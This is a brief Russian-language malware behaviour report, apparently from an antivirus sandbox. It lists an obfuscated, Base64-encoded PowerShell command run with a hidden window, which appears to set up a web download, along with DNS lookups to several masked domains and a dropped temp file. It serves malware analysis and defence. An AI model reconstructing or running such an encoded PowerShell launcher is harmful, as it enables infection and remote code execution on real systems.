Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAQQBVAFUAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYARABRAEIAbwBBACcALAAnADQAJwApADsAJABvAFUAQQBHAEEAUQBBAEEAPQBOAEUAdwAtAGAAbwBgAEIAagBFAEMAVAAgACgAJwBOACcAKwAnAGUAJwArACcAdAAuAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1560
- %TEMP%\1160335.cvr
- DNS ASK th####stheory.com
- DNS ASK st###biemans.nl
- DNS ASK ba####gsanq9.net
- DNS ASK ta##.cba.pl
- DNS ASK ze###.echoes.co.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFEAQQBVAFUAQQBBAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYARABRAEIAbwBBACcALAAnADQAJwApADsAJABvAFUAQQBHAEEAUQBBAEEAPQBOAEUAdwAtAGAAbwBgAEIAagBFAEMAVAAgACgAJwBOACcAKwAnAGUAJwArACcAdAAuAF...' (со скрытым окном)